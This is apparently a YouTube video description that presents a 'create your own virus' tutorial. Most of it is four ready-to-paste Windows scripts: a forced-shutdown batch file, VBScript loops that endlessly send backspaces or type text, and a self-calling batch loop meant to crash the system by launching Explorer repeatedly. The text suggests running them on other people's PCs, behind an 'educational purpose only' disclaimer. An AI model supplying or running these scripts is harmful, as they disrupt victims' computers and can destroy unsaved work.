Tutorial on how to create your own virus in just a few steps; brought to you by techwagon.
Please comment down below if you have any queries or want more information regarding it.
Please like, comment, share this video and subscribe to our channel for more amazing videos.
Here are the following codes for the scripts:-
Just copy and paste these scripts in notepad and save it accordingly as shown in video.
This video is for educational purpose only, we are not responsible for any damaged caused to your PC or others PC, have FUN!!!
1. The Rebooter:
@echo off
shutdown -c “ERROR!!” -s
2. Backspace Deleter:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
3. Infinite Typer:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are doomed."
loop
4. Sytem Crasher:
@echo off
:repeat
Explorer
call loop.bat
Goto repeat
Music : Jim Yousef - Firefly [NCS Release]
Link : [ Ссылка ]
Artist : Jim Yousef
Link : [ Ссылка ]
Ещё видео!